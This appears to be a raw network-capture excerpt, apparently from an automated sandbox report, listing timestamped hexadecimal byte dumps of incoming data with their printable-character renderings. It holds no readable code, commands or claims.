                                                                                                                                                    2022-09-29 12:59:14 UTC17686INData Raw: 8c 69 78 96 fa 6c 92 4c 61 98 38 af 08 10 46 f6 8a 52 16 3b 99 ff 92 48 72 c7 1e 6e 83 dc e7 76 8c 63 52 9a 46 42 82 da 8f 8b 76 e9 69 ef d7 fe 57 58 f2 27 a7 a2 02 8d d0 f9 06 f9 e7 85 ee b6 64 83 fe 9d a6 27 05 eb c5 5e 84 a7 47 b1 75 90 e7 71 af ed 7d aa f4 c9 cb 01 64 b0 6c cb 23 56 a2 02 86 d3 6c ee 14 c8 8e fa c7 50 35 35 f9 b2 9f 53 d8 25 44 f1 f1 5f a9 f8 91 fd 9d a6 a0 45 00 23 e5 51 cc c8 40 f1 71 5a ca b7 88 ed b0 6f e1 5d 17 fc 81 af d2 58 61 bc 8c 71 5e 75 c8 c9 e2 1a e2 f7 c7 60 4e 9e 1a 5e 8c 2e 7f 1b ba 1c 6c fe cb 8a d5 bf b3 43 30 b0 d6 3f 6c 87 fa eb 16 17 94 21 a9 74 fc e7 bd af 38 da 90 06 b6 17 9d 86 3b 05 1f 6c 93 f9 4d 1f bb 7e d8 63 58 e4 82 e3 e6 9b a3 99 d9 42 35 82 80 94 e9 5e 0e d3 74 22 68 21 d3 ce 25 07 81 61 39 9e 3a 4e 89
                                                                                                                                                    Data Ascii: ixlLa8FR;HrnvcRFBviWX'd'^Guq}dl#VlP55S%D_E#Q@qZo]Xaq^u`N^.lC0?l!t8;lM~cXB5^t"h!%a9:N
                                                                                                                                                    2022-09-29 12:59:14 UTC17702INData Raw: c6 da 9c e3 3c fe 5e ad d2 06 4e b2 d5 36 62 40 79 33 f7 1d 38 1a 53 8c cc e9 74 b1 26 af de 89 3b 1e 75 15 5b 2c f1 3d d1 3d 03 c0 64 ce fa 98 ec 01 aa de 94 aa ab 02 3c 3d af 1a 71 cd f6 3f a3 4e d6 1e ed 08 36 f1 6a 69 16 7e c7 da 33 ae fe 1b b8 ff 5c a9 75 e0 7f 65 a5 50 54 b8 62 fe 21 89 b7 d9 a4 25 38 da d2 00 5d 7e 0c 14 c8 3d 60 00 af 02 07 99 f5 34 eb 4e 1c 5a f8 9f d2 d3 0a bd d7 84 b4 11 ea 24 e3 df 04 d1 9b fc 87 0d 96 92 0f 6b 71 48 3f 66 7a b6 7c b5 f7 d5 16 5f fc b8 a8 e8 58 b3 4d c7 c4 8b b6 65 6a ed 56 4b 6c fa 44 44 b0 d8 3d 7b 94 2f cf 40 5b 0f 6e 1b 96 36 28 3f 00 5a 0c 02 9e bf 47 5e 26 9b 53 d4 50 76 2b 89 0c 86 9b 78 48 e4 3a 42 5a c4 39 28 81 1c c7 49 02 fa e0 56 14 0b 2e 91 b7 cf 3f 99 36 f3 74 21 b8 ff 62 e9 9b b1 79 dc e9 0c 4a
                                                                                                                                                    Data Ascii: <^N6b@y38St&;u[,==d<=q?N6ji~3\uePTb!%8]~=`4NZ$kqH?fz|_XMejVKlDD={/@[n6(?ZG^&SPv+xH:BZ9(IV.?6t!byJ
                                                                                                                                                    2022-09-29 12:59:14 UTC17718INData Raw: 0c 52 88 b0 f6 f7 7b da 2c 87 69 97 59 9c fc 10 44 29 70 9c 5d 38 43 08 0d 8f 0d 7c 67 37 f9 fb 15 1c 34 76 2b 28 6a 90 a5 13 d6 57 4e 12 ad d7 28 12 4d 58 04 e9 38 df d7 80 1c 1e a3 57 0b c5 92 6e 1b a6 88 03 6a 23 de 32 8c 59 26 2f 64 eb 38 a4 97 ca 7c fe 48 f2 40 d6 17 76 1f ea 35 8e 1d 40 0c ea ad 86 2f f7 23 9b 40 6f a1 06 5c 18 04 07 75 db fe 50 9c 60 e0 85 fe 02 2b f1 ad 4e cc b4 69 ae 6b 49 2d 43 1d 61 f9 05 c2 69 fa 4e 4c f5 8a f5 7a 40 91 c6 8e 2d 6b c0 68 c9 5c fb f8 e6 21 29 c5 3b 31 f2 de a2 60 96 e2 e8 37 7f a5 c7 b0 73 68 79 9a 19 aa 39 c5 20 3a 6b f4 3e c1 41 a1 4a d8 62 dc fc 82 5c bf 2d a3 60 d4 4f d4 57 55 0a 19 ac 6f 93 1e 28 62 14 4f 3f 0f 1a 35 aa 77 20 ae ed 36 70 2b 71 a4 78 28 78 5f 28 56 ce 58 9f ae 54 ab ab d5 98 5d 0d ba 47 0f
                                                                                                                                                    Data Ascii: R{,iYD)p]8C|g74v+(jWN(MX8Wnj#2Y&/d8|H@v5@/#@o\uP`+NikI-CaiNLz@-kh\!);1`7shy9 :k>AJb\-`OWUo(bO?5w 6p+qx(x_(VXT]G
                                                                                                                                                    2022-09-29 12:59:14 UTC17734INData Raw: bb ac 43 53 e7 e7 53 c3 e3 f6 7e 02 ab 48 ed ad 42 c3 de 20 f1 5b 5b ec 0c 72 1f 8d 5f ae 33 af 94 9a 21 d1 25 12 a6 a9 16 9f ee 28 75 c0 a9 73 c3 16 ba 64 88 b6 db 3c 1f 38 90 37 f8 98 b6 de 7c a3 60 36 b3 85 e2 8b fd 7f 8e 4f ec 8d 42 9e 9a 8b d7 ad ca cb 14 7c d2 08 9b f7 6f ee 6e c9 22 d7 9c bc 36 0b f1 da 18 fb 92 0f 88 12 5f 51 86 35 ab 5d 3e 73 59 11 8c e9 34 f2 de b4 67 a7 7d b8 0d 46 49 78 cd 87 48 b8 64 23 12 7c 79 70 5f 1b 9c 3f a0 d2 ae d3 0d b5 fc 40 1f e0 75 74 a1 c7 cc 8a 20 2a 85 61 88 05 74 b7 2f 42 fa a5 5c b9 cd 2c e3 7e 9b 52 4b d9 86 68 f5 ba 06 82 a5 68 e9 43 0f 9f d9 7c b5 5d fd 11 b8 74 b6 e1 7c fe ce fc 42 0f ac 61 7c 19 46 83 e2 a2 32 97 55 b8 21 c2 f5 72 35 e7 62 72 eb 4b db 6d ae 8c 94 6b a1 60 5c 6c 51 6d db e5 25 58 25 da a4
                                                                                                                                                    Data Ascii: CSS~HB [[r_3!%(usd<87|`6OB|on"6_Q5]>sY4g}FIxHd#|yp_?@ut *at/B\,~RKhhC|]t|Ba|F2U!r5brKmk`\lQm%X%
                                                                                                                                                    2022-09-29 12:59:14 UTC17750INData Raw: e4 e1 f7 5c ca 87 63 d4 6b 2a d7 2d cd 23 e4 20 84 77 26 e4 6b eb b1 ac 9a 66 1e e5 3b 5f b4 1a 6d 92 b8 0e 14 f3 63 16 2d 15 30 5e bb d4 66 08 54 6e b0 ca 17 f8 43 c5 a5 27 5d 36 31 c5 21 eb f6 d8 0f ff 0e b7 05 21 02 90 d1 f6 dc 45 02 9e 5d ba bb 65 67 65 62 8e 9b e6 3e b6 3d 8d 80 00 be ae 19 0f 45 0c c1 be ce 1d 0b 9b 7b 7a 9a 3d f4 bf 40 cb 8a 7a bd 9d 60 a1 90 15 12 17 7c de 2b 6b 19 95 dc ac a7 ac 43 6b d6 a6 77 f2 4c 0a 15 33 5e 65 27 1c 2d 59 91 1a 96 2b e3 ce 7e bc ab 46 49 00 d8 23 eb 9f 68 2a d1 08 30 02 90 fc 64 7f 0c b0 05 07 21 d7 43 13 3d 37 f8 e5 1a e7 c1 20 d0 f8 cf d6 71 84 18 ab d1 4b 2e 76 37 3e 85 98 70 af ca 6b 81 81 15 6c 6c 75 9a 41 44 49 69 1d 78 b4 ee 07 39 b1 b5 38 ec f4 b0 dc 9e 51 6f 13 12 32 04 e3 37 80 a0 83 29 a1 df 99 1d
                                                                                                                                                    Data Ascii: \ck*-# w&kf;_mc-0^fTnC']61!!E]egeb>=E{z=@z`|+kCkwL3^e'-Y+~FI#h*0d!C=7 qK.v7>pklluADIix98Qo27)
                                                                                                                                                    2022-09-29 12:59:14 UTC17766INData Raw: 42 1c 23 02 46 5f 88 17 52 bb 9f 59 f2 e1 12 1d 12 0a f5 d3 c7 65 31 eb 54 57 55 67 fa 86 48 10 a3 51 8b a6 d4 1a d0 f9 02 73 39 10 73 34 d0 2a 14 70 1f 39 83 30 47 84 1b d9 eb 29 40 68 70 18 c3 df 35 3a f9 25 03 90 34 f7 93 4f 8f f9 9a a8 37 df f8 a5 f3 66 23 df 95 b4 17 3f 35 92 44 27 4f 76 9e d7 ac 8b 51 65 fd f4 3b 5f 1f 6e 3d eb f1 0b da df e6 4f 23 4f 0f 43 75 08 d1 41 e1 bc 59 d7 70 b0 2c 0a 14 9f 3a 7d 45 ba 00 b8 0e 37 e0 ce 5c c7 17 2e c3 d2 06 a9 27 8d d8 f8 36 46 26 70 77 7a aa 6e 93 19 9f 0a ca a5 54 26 e8 c6 b1 63 c7 06 55 5a 4e 2b 42 a7 77 a5 4a 0a e5 02 a0 7c a5 c0 79 fc db 36 76 c6 33 a8 6c 7f 0e 51 ee 6c dd e3 c0 f8 da 68 7e 75 ac ed 87 0a da e7 97 25 c9 49 d5 59 74 ec 74 61 95 44 93 5d af d2 44 cc 2d ad 33 6d 90 04 a7 78 5f 15 92 f5 43
                                                                                                                                                    Data Ascii: B#F_RYe1TWUgHQs9s4*p90G)@hp5:%4O7f#?5D'OvQe;_n=O#OCuAYp,:}E7\.'6F&pwznT&cUZN+BwJ|y6v3lQlh~u%IYttaD]D-3mx_C
                                                                                                                                                    2022-09-29 12:59:14 UTC17782INData Raw: 7b d0 83 ad 9d 7d 50 f9 4a 46 30 05 8a d3 8b 08 45 fe 62 d0 73 e5 e0 59 a2 b3 99 cb 9a c1 f9 11 3f 35 73 98 8c 31 51 ef 7f 03 76 d5 70 99 34 05 7e 07 b6 61 84 b8 a7 97 78 4e 66 e1 34 ec 10 d2 c6 91 a4 6f 39 1b d6 5f 9f 39 f5 fc d3 7c 95 c5 31 56 3b 01 a9 8f e0 f2 14 60 fd 77 a7 36 10 5d 60 f3 0e 09 d8 db ae f8 69 08 2f 68 77 5f 43 14 28 19 76 1a 83 81 01 3e 39 48 01 4e b2 2e 3b 05 2f d4 bf 3f 25 0a ef 56 04 3f eb 03 ea 7c 16 de 4b 02 7b b1 9c 35 4a b1 da f8 d3 6c f2 ca 11 97 c3 44 7b ea a6 e7 8b f8 fa bd b5 7c dd 52 c4 cd c3 69 27 f0 fd 51 1e e3 66 6c 0a d5 bb 38 0e 75 d9 29 ea 19 87 b4 24 ab d4 61 c4 b4 bc 4a 0a 44 49 8f 10 cf eb e8 54 4a 89 6c ca 3a 54 95 c6 41 39 83 c4 48 5e c5 c8 a8 a1 25 c6 31 d8 10 7f cb 2d c0 6e 67 dc ee 3d fa 5b 35 66 ad 67 32 81
                                                                                                                                                    Data Ascii: {}PJF0EbsY?5s1Qvp4~axNf4o9_9|1V;`w6]`i/hw_C(v>9HN.;/?%V?|K{5JlD{|Ri'Qfl8u)$aJDITJl:TA9H^%1-ng=[5fg2
                                                                                                                                                    2022-09-29 12:59:14 UTC17798INData Raw: 50 7b 04 1f a1 b9 2f d4 be fa e6 33 13 68 d6 12 29 a3 40 08 09 95 01 81 13 6b c5 fe 8e f7 cc 3e 3c db ba 18 6c bf be c7 f3 b0 1b 34 95 aa da 1a 60 14 a9 32 4a 2c 7e 91 d1 e9 32 54 6a c1 b0 9a f4 18 64 19 fd a8 13 1f cf 9c ce 7d d4 bf c0 13 88 69 11 81 9f 79 76 19 8f b9 a3 ec 46 01 30 71 92 30 d2 28 b8 08 00 d7 98 78 7b 47 43 d0 e4 f4 b1 c7 eb 34 92 09 07 25 ff 03 65 80 ee 24 a9 ca aa 91 9c 85 d6 be 38 de 4b fc 6a 4c 9c 55 61 2a 77 95 cc 15 f1 d4 18 d9 0e 08 92 9f 01 23 3d b5 d9 cf 3b a5 cb 2b 31 a4 78 a0 2d c2 01 37 58 d9 ec 20 5a aa 13 b4 94 7b 63 55 bf b8 07 f2 da 7e b2 fb 8c 8f be dc a8 4f 7e 22 2a 38 6d 32 cf f1 8e 4e df 70 f9 89 2d cc 35 57 bc a4 c5 09 88 2e e0 7b 43 9e 3e 79 99 06 b6 7e 0b 48 23 71 10 4b b7 65 ce 26 85 a7 27 a5 01 6b 41 96 54 5f 28
                                                                                                                                                    Data Ascii: P{/3h)@k><l4`2J,~2Tjd}iyvF0q0(x{GC4%e$8KjLUa*w#=;+1x-7X Z{cU~O~"*8m2Np-5W.{C>y~H#qKe&'kAT_(
                                                                                                                                                    2022-09-29 12:59:14 UTC17814INData Raw: 06 e5 d8 f7 6d 23 d1 ec f0 0c 6c 2b 74 0a 7d 5a 7a 25 7b 36 4e 4b 30 0d fc 3b 07 f8 e4 88 63 f3 be de 73 93 23 41 a2 c0 4c db f2 a4 06 d8 37 84 f9 2e 86 87 e2 55 68 4d 3a 7d fb eb 93 d9 0c 58 51 13 9b 89 a1 7f 5e 59 f1 d3 2b 49 1f b2 f2 71 b8 92 82 a8 00 97 c4 d2 05 55 47 7e 1e 40 a8 51 a3 ab 4c e5 31 7f 3f 63 f0 dd 30 50 69 da 6f 52 46 6d 12 28 ec c1 24 79 5e f7 bf 4f 7c ea b7 48 06 8a 24 cf 14 d1 6d a8 fd dc 26 5b bf e3 24 6a ff 58 34 f4 11 22 b4 c5 7c ce 96 89 66 ab 2a 08 80 90 fd 61 26 6c 14 0b dd a1 08 c7 9b 55 b0 d7 fc 55 ec 1b b5 cd 31 5d a2 85 fc a7 ed 2b ea ee 2a a7 08 47 9b 91 3d 3f 30 a7 6c 1f b1 cb 1d d9 41 e0 aa 32 49 da 41 ec 35 0b 82 6b 54 e7 15 76 20 be 9d 36 f5 a7 9c 17 aa 90 67 5e 24 a3 0c f2 30 9f 81 3a ff 1b 08 28 af 3a ae 04 fa 75 47
                                                                                                                                                    Data Ascii: m#l+t}Zz%{6NK0;cs#AL7.UhM:}XQ^Y+IqUG~@QL1?c0PioRFm($y^O|H$m&[$jX4"|f*a&lUU1]+*G=?0lA2IA5kTv 6g^$0:(:uG
                                                                                                                                                    2022-09-29 12:59:14 UTC17830INData Raw: d4 42 77 85 31 09 47 a1 9e d5 ac ec 73 f9 29 e5 e9 ab 98 b9 b1 7c 24 0c 62 02 73 97 04 d1 70 c0 7c 9c 0e a0 0b 0d af 16 46 92 1b 7d 8b 5e 7c 3f 69 5b 06 51 c3 80 75 89 e5 1a a3 5b 1c ea 94 2a 27 a7 6f b8 94 b0 ed cb 90 05 e5 dd c7 c8 7e 53 6c 9a ce 18 f9 d5 49 ba c4 95 3a fc a3 34 17 57 04 b0 64 cf 49 1b 53 0d 29 71 82 e0 90 52 e1 a1 d5 77 d2 61 65 32 2a 55 0e bd 67 62 cb d8 bd ec ce e1 b2 13 53 3c 04 f9 fe 23 83 8f 8e fb 17 33 7f 02 b1 01 eb 57 ce a6 1b 64 53 fb 94 47 19 2d 1b ee fe e3 47 f4 ac 35 8e e5 60 33 f6 36 88 cd c3 44 c6 59 dc bd b0 b1 ca 86 00 c2 88 81 de 0d c3 32 40 84 07 c0 f0 f1 b0 b6 33 7f dc 3e a6 af bc ca 42 07 55 f2 3e 80 b7 26 74 88 74 4c 9f 24 da 8a fd 9d 13 ca 4c d3 67 24 68 a6 08 25 a1 b4 45 be d8 38 72 cc 74 d7 de 01 75 f5 85 92 a8
                                                                                                                                                    Data Ascii: Bw1Gs)|$bsp|F}^|?i[Qu[*'o~SlI:4WdIS)qRwae2*UgbS<#3WdSG-G5`36DY2@3>BU>&ttL$Lg$h%E8rtu
                                                                                                                                                    2022-09-29 12:59:14 UTC17846INData Raw: 02 15 38 74 ba 46 cf 63 4d 5f 57 45 e0 18 e4 19 7a d1 e7 96 43 5d 95 c8 ba c6 5b 4d f0 c0 79 31 03 4f c6 00 03 1b 0c ad a3 44 b1 ad 9f ef 11 34 b2 69 f9 d2 f3 91 bc 88 74 31 08 70 4d b7 cf e3 e1 69 bf f8 ad 5a 6e 30 05 6a 27 f5 3e 0e 00 10 04 3d 5c 8c 19 6a eb c2 be b6 39 cb 3c b2 82 f3 b0 78 73 bf 8f ce 55 aa 39 c3 23 c2 2e 6d e1 03 a6 48 f3 b1 25 c8 a2 88 93 ee be af f9 75 d4 be 40 04 26 33 05 f3 67 a3 90 c7 ff 7f fc f9 f2 30 4b fd 8f d9 10 be a1 37 e7 db c9 3a 1c 18 a5 a1 e7 5d 8d 8d e8 5a 44 f4 e8 67 bf ad f3 b1 17 26 b0 6e 19 26 09 0c f0 07 1b b0 20 01 0e dd 7c 4c 5d 52 4d 93 75 3e fc 72 3a 93 9a db 43 5f 9f 9e af e4 91 cf fc 2d fd e6 a5 84 be fb 90 5c 31 6c ed 2c 68 41 6b fb 0d e4 f0 ec 2d 72 1b 32 6a 95 77 54 e9 76 aa 0c b1 74 54 f9 db cc 0c df f1
                                                                                                                                                    Data Ascii: 8tFcM_WEzC][My1OD4it1pMiZn0j'>=\j9<xsU9#.mH%u@&3g0K7:]ZDg&n& |L]RMu>r:C_-\1l,hAk-r2jwTvtT
                                                                                                                                                    2022-09-29 12:59:14 UTC17862INData Raw: 2e 9e ca 2a b0 fc 86 e4 e3 7c 4e 7a 98 db 15 6a cb da 68 1b c4 17 85 43 21 64 1c ec 1a 3d 91 d3 3a e4 01 17 83 59 58 b3 c2 ae 08 63 7a e2 4f 21 32 1a 87 67 a7 0a 66 03 1b 24 50 44 a8 71 88 a1 47 9e 39 a0 44 34 b4 1f d3 e0 2d 9a 99 e7 ec 13 c1 75 8b 53 71 1e bd 91 d8 78 1f 77 56 4a cb 55 4a 34 d0 6e c4 69 bc e8 f9 c5 33 cc 87 8f 4b 62 ab 2a f2 db 59 8c 46 f2 fb 77 3d aa 17 f0 d3 7f 97 8c 99 6e 42 00 f7 91 39 14 9b 72 2f 62 e6 02 3f 0c 10 1e b9 a3 9f 08 a9 72 87 6f fc de 24 47 6a cb a5 8d 12 69 9d d5 22 ea 4f b5 b8 3d ba b5 ab 0f 93 1e 81 6e b3 77 ec 4b cd e4 25 70 01 ca 1b ac 15 0e 94 92 2a ec 64 1c d7 6e 6b 78 14 2f fd 0f 4e 9d 53 e7 fe 56 9c c7 a9 e8 df 4d 49 be 9e 79 da 29 b5 19 49 95 a2 48 b5 e6 fa 24 3a 99 e9 10 3b bc 91 4b 61 4f 0d 94 1c 35 b1 8c 82
                                                                                                                                                    Data Ascii: .*|NzjhC!d=:YXczO!2gf$PDqG9D4-uSqxwVJUJ4ni3Kb*YFw=nB9r/b?ro$Gji"O=nwK%p*dnkx/NSVMIy)IH$:;KaO5
                                                                                                                                                    2022-09-29 12:59:14 UTC17878INData Raw: e1 f5 a8 f4 45 9b 0b 25 08 a3 e7 18 2f 6d d3 24 51 6e 29 e1 a4 57 f9 d1 8c 44 28 3a 29 64 bd bf 55 41 4c 5f 1b 03 95 bb 4d 92 3f d8 47 77 54 ea d2 c1 cb b1 1a 18 67 06 cd 39 37 1d 32 1a 31 45 75 72 56 8c ea 8d 71 5e b8 5f 63 55 b4 a0 e4 a2 d6 96 10 47 c3 65 3a 92 5d fa a1 16 79 50 29 8d 58 c8 40 ce ea 6d 5a 2b 6e 28 53 90 60 10 da a8 82 00 86 3c 83 58 a5 cd ba 39 4f b4 0f 7c d8 75 99 1d f4 1d ce ea 93 2a 17 42 24 e2 b7 1c fd 4e 4b a7 12 80 d6 c4 a7 07 95 ec 71 42 05 aa 59 03 2f 65 2a 9e e8 4e 13 d3 a7 e8 99 ff 8b 11 cb 91 7f 10 c8 17 30 db b6 a1 53 81 04 17 8e c9 cd f6 ff 5b 9e 45 a5 bb ab 3e bb cf a1 fd e4 d4 0c c7 75 14 2c 9a 91 6c 48 40 b5 b5 41 da 91 bb ab 59 02 d2 9e 74 e3 84 f3 44 ec e8 bd 3f b7 ad 1b 7c 80 f5 e2 5f 97 44 56 c7 a7 1d ce 29 72 6e 82
                                                                                                                                                    Data Ascii: E%/m$Qn)WD(:)dUAL_M?GwTg9721EurVq^_cUGe:]yP)X@mZ+n(S`<X9O|u*B$NKqBY/e*N0S[E>u,lH@AYtD?|_DV)rn
                                                                                                                                                    2022-09-29 12:59:14 UTC17894INData Raw: 74 71 46 50 6e 75 31 76 ef fb ed 54 96 d9 90 65 98 7c e6 0d 9d 9a db e9 47 b0 0c 25 1a bb b0 1b ea c0 fc 96 d4 e6 2e b2 d2 00 ae 4c 36 d9 2b c7 81 80 2b 9b 19 01 17 23 4e 8a 34 25 0c 0b 87 f5 6a d8 46 56 04 f7 cc 94 3d c7 91 d4 54 04 15 7c d3 c0 a0 b6 10 a4 b0 a2 20 d4 1a ea a4 eb ac 11 bf e1 cf b1 a3 91 75 34 5e b8 18 09 53 a9 c9 34 6f 6b 17 c7 c9 4f 49 9b 68 5a 0b ce bf 92 38 04 af 0d 69 ed 77 e9 37 95 d5 e3 d1 45 ff 4d 9d b9 bd 75 9d bc b9 c9 c6 3d 8f 54 1c 7e d7 7b 15 02 33 c4 d3 27 2f fe 67 13 8d b8 cb cc af 10 11 76 f8 0c cd c5 2a 97 2f 67 f4 41 c6 cf 73 94 b2 a5 e9 ae ab 03 92 44 a2 08 14 b0 b3 4b 92 44 38 c0 0b 59 80 73 f9 5d e1 db 8d 48 13 e7 51 99 f1 cf d5 da 2f c4 e7 59 50 94 c7 72 57 f8 c7 72 38 15 41 da 05 3c 58 cb 3f e6 f9 a9 53 9f e2 96 9b
                                                                                                                                                    Data Ascii: tqFPnu1vTe|G%.L6++#N4%jFV=T| u4^S4okOIhZ8iw7EMu=T~{3'/gv*/gAsDKD8Ys]HQ/YPrWr8A<X?S
                                                                                                                                                    2022-09-29 12:59:14 UTC17910INData Raw: 21 70 01 df 9c 8f fb cc cf db 86 76 9c b3 17 c5 ad 89 e9 13 14 d2 3e 50 b6 da 62 ac af 38 d7 cd 4f 20 27 90 5a d0 c8 ac f3 80 9b 59 c6 fb 87 31 92 b1 b4 ac 2b 10 7b 9d 04 fc 16 3c 80 77 bf 87 47 1a 7d 3e 27 fd 84 ab 29 ed 55 0d 67 93 38 2c 38 ae 14 00 26 c2 24 e4 50 9d 95 18 f7 ca be df dc 8d 3a 80 bd a1 81 a3 fc b2 10 43 ed d2 d5 09 f6 21 54 f6 c4 4f dd 40 bc 6e 2a be 25 4c 38 39 21 2e 47 17 a1 61 15 da 99 69 b1 52 ef aa d2 0c 29 f3 9b 4a 37 e1 b7 47 aa 86 b7 dd ce d8 84 7c 5d b5 86 42 4f 2b 35 6f 9f 90 4c 09 c2 82 1c e4 45 09 06 3b 7b c3 bd 2e 1f 17 6d b0 eb 0e a3 15 9d af e9 27 e4 93 e5 41 b3 ff 72 25 d0 60 86 6d f4 3b 62 0f 3f 96 33 37 da 85 b6 52 2b 13 dd 42 1c 02 ad e5 9c 76 70 33 a0 78 fe b6 96 60 73 91 19 de f7 59 e5 9a 21 3f b0 e4 1b 94 4d c6 c7
                                                                                                                                                    Data Ascii: !pv>Pb8O 'ZY1+{<wG}>')Ug8,8&$P:C!TO@n*%L89!.GaiR)J7G|]BO+5oLE;{.m'Ar%`m;b?37R+Bvp3x`sY!?M
                                                                                                                                                    2022-09-29 12:59:14 UTC17926INData Raw: c8 12 e0 3c 38 d6 ff bb 97 eb d0 33 2e e9 e0 0e 0b dd 22 d4 d8 99 6c 69 8d 07 6a 41 8f 9c a5 0e 88 c9 0d 95 d1 16 c8 e4 ea bb 25 16 10 d8 b2 f7 48 8a 3f 86 e3 e0 8f 8c da 4b 56 3f ab 99 ea 12 eb f2 86 1c 97 d3 3a d1 5e 80 b2 b6 4a b1 6e e4 c6 24 1b 49 e2 b9 05 46 b7 43 a0 a1 e1 95 03 fe 55 37 7e cb e2 ee ee 35 5b c1 5a 39 4d a2 d3 46 5c c3 f9 cf ad 44 af 85 24 7c 66 39 8a 41 e9 51 ce cb c7 ba ee 1a e4 24 ae 34 10 22 e5 49 c1 3a a4 29 b8 78 3f e8 9b fc 45 73 ce 6b 4c 5a dd 50 c1 1b ff 4a fe 0c 92 1a bd 65 12 d8 73 de dc 1c 12 fd 29 e1 2b 48 bf af 0d a7 b1 02 55 fc d3 84 a0 ae b4 c5 83 5c 8b 6f 5e 91 7f 01 95 bb 3b 46 99 16 28 27 ef 90 25 cd a5 07 4e b3 2e cc 10 23 3d ee 5b 2a 9c 1a 4e 05 da c0 e6 13 6d 18 d2 d2 8f 4b 3c 70 24 04 5d 05 6d 2e 00 39 48 57 30
                                                                                                                                                    Data Ascii: <83."lijA%H?KV?:^Jn$IFCU7~5[Z9MF\D$|f9AQ$4"I:)x?EskLZPJes)+HU\o^;F('%N.#=[*NmK<p$]m.9HW0
                                                                                                                                                    2022-09-29 12:59:14 UTC17942INData Raw: 4b af 98 53 22 c9 9d c4 6c ae 19 26 f6 90 71 db 84 16 a9 04 bc 01 69 29 2f e9 e6 8e 91 7a c1 cb 98 e6 e7 36 cb b6 53 4b e4 84 ad 66 89 00 c4 3b 8b 2b c9 94 18 aa 99 a5 64 a3 0c 0c 79 2a da b2 ac 28 51 36 79 21 2e 10 cd 39 3b a0 93 c0 c7 c0 30 d7 26 e5 cf 60 ea 29 be 82 6d 0d 0a 99 8d 5e bd 69 e3 6a fd f0 6d e2 f0 e0 94 a0 16 13 c6 c0 69 5d 97 67 6a eb ef 83 2b e1 93 92 7b fe a3 28 8f df a1 0a 3d cf 71 eb ea dc f1 c2 27 50 2d 26 e6 45 15 2a d7 3a 64 56 03 28 6f b7 e1 1e 8d 14 d5 2e a0 a1 5e 2e d1 26 87 34 8a 59 6d ba 25 86 68 8d 98 58 f0 e0 da 87 a2 06 7d b3 bd af 63 4e 89 3c 03 43 31 77 7c 34 75 85 b9 9f f6 51 2b 6e 01 2d dc 0d d1 e5 1a 2e bc c2 b5 80 62 61 56 76 5e 8d cb 8e 26 41 d9 97 3b ad 4b a3 7f cf 07 8f 44 8d 8c 1b f8 42 5c 5a 9b f7 5e f7 84 57 36
                                                                                                                                                    Data Ascii: KS"l&qi)/z6SKf;+dy*(Q6y!.9;0&`)m^ijmi]gj+{(=q'P-&E*:dV(o.^.&4Ym%hX}cN<C1w|4uQ+n-.baVv^&A;KDB\Z^W6
                                                                                                                                                    2022-09-29 12:59:14 UTC17958INData Raw: 01 60 dc 43 16 51 76 23 fc 14 fc 8d 1d 16 34 21 b4 57 88 50 02 49 1f b6 be ef 50 cf 75 5f ac 7e 52 87 df 4f 72 ed bc 2b 0c 94 af 50 e3 c7 26 cb a1 2e b3 33 e5 db f6 a3 5c 63 0e 28 67 8a 6b c8 29 5a 6d 35 71 e9 d9 d8 4f 0b 13 97 c9 73 c7 20 ad 5e a4 98 c5 1e ab ff 0f 98 1a 58 e6 d5 12 dc bd 84 4b f2 4f ed 0a 03 31 65 fa 13 7b c7 a0 48 87 3d bf 07 a3 b5 32 37 47 9d 9f 6a e6 5c 2d 20 4d f6 23 55 76 35 09 71 fd 56 12 95 53 a4 bc 10 60 78 a0 24 a3 dc 5f fb e4 31 e9 54 0d 28 da ae e7 40 a2 59 49 4a 6b 7b e8 bb 40 ae 53 b5 ea f6 b9 71 76 6b 4a 90 01 46 1f 4c 7b 60 c8 57 aa fb 13 ee 99 41 35 30 48 83 f0 c6 a7 4a da da 63 aa 6d 2a bf 01 0b 75 a8 31 75 aa a4 32 ad 58 13 81 98 92 b7 55 42 4b 47 79 47 12 d2 dc 62 3f dc 5f cb c7 d6 f3 6f c8 d8 b2 2f 50 9e e4 8d 8e 44
                                                                                                                                                    Data Ascii: `CQv#4!WPIPu_~ROr+P&.3\c(gk)Zm5qOs ^XKO1e{H=27Gj\- M#Uv5qVS`x$_1T(@YIJk{@SqvkJFL{`WA50HJcm*u1u2XUBKGyGb?_o/PD
                                                                                                                                                    2022-09-29 12:59:14 UTC17974INData Raw: be d8 17 a4 53 0a 7d b0 62 9f c1 40 17 91 b3 b0 27 b6 3b fd e9 11 c9 a2 dd ed 33 09 f2 7a f7 4a 82 e8 e8 1e 3c 4b 92 e5 3b 89 83 5b 89 20 7b c8 26 34 e5 3b 32 05 5a c5 8e 99 d5 f7 e9 9e 4e 91 47 17 a6 7b 20 91 09 e4 f0 70 08 94 29 38 44 f5 2c 4b 46 c3 a4 30 f6 2c 74 92 27 5e 62 47 81 db 67 5c ae 58 5d 87 ea 29 f0 32 4a 6b 23 f6 94 92 8c 59 9f 69 ae 1e e2 90 ed 1b 32 ce 59 8b 54 2c 4a c7 07 cd 3f bd 73 82 1a 82 0b 60 aa 53 97 c3 8d c1 b3 03 d1 16 30 52 8e 3a dd d2 94 07 3b 9e 76 d9 28 96 99 08 ff b6 dd bd 15 c0 2f 24 c6 5a 53 cb c2 e3 9b d5 5f 45 3f d6 98 78 f1 c2 3f c3 a7 79 16 d2 65 46 12 28 12 f6 2d 73 6c 0b f9 96 35 22 96 d8 cd f0 b2 4f 1d cb a0 6f ea ce d0 14 a4 04 4a aa ba 25 f2 da a6 bf eb 87 ef 80 05 3d c9 b4 0c 1a c4 f9 ae 24 5e 0b 47 f2 92 ff d8
                                                                                                                                                    Data Ascii: S}b@';3zJ<K;[ {&4;2ZNG{ p)8D,KF0,t'^bGg\X])2Jk#Yi2YT,J?s`S0R:;v(/$ZS_E?x?yeF(-sl5"OoJ%=$^G
